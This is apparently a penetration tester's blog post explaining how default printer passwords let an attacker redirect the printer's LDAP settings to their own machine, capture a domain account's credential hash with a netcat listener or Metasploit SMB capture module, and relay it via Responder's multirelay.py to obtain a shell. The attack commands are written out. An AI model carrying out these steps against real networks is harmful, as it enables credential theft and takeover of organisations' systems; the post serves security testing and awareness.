Default credentials on critical systems such as public facing portals (ERP Systems, VPN Gateways, Firewall Consoles, etc.) is something that you would take seriously and action on them immediately, right? What if this was the same case for your printers? A lot of people would consider default printer credentials as something trivial that won’t cause any harm. Well, I also thought of the same until my buddy Seth introduced to me earlier last year how I could use this to gain foothold on a network. And interestingly enough, this is something we come across in almost every Pentest engagement we are involved in.
First of all, locating default credentials is as easy as typing “printer name and model” + “default password” in Google.
This will grant you access to the printer’s web administration portal.
A lot of organizations integrate printers with their domain for authentication purposes. Locate the LDAP configuration page of the printer. If you are lucky enough, you might find an account with domain admin privileges on the LDAP config page.
Change the Host Name IP address to your Kali Linux IP address and Click on the Test button. This will initiate a connection to the “authentication server” which is now the attacker’s machine. This will pass the NTLM hash of the account configured in the LDAP configuration page to the attacker’s machine. You however some form of an “authentication server” to capture the hash passed from the printer.
You can set up a netcat listener and capture the hash.
netcat -l -vv -p 445
Or use this Metasploit auxiliary module
use auxiliary/scanner/smb/capture run
Having gotten the Admin hash, you can either use the old-fashioned way of cracking the hash or use the Pass-The-Hash technique. My go-to tool for Pass-The-Hash and SMB Relaying stuff is Responder. Fire up Responder.
And relay the received hash to a host with SMB Singing Disabled using multirelay.py which is the same as Impacket’s ntlmrelayx.py
python multirelay.py -t <IP Address> -u administrator
And just like that you’ve got a shell!
Here is a visual representation of the attack.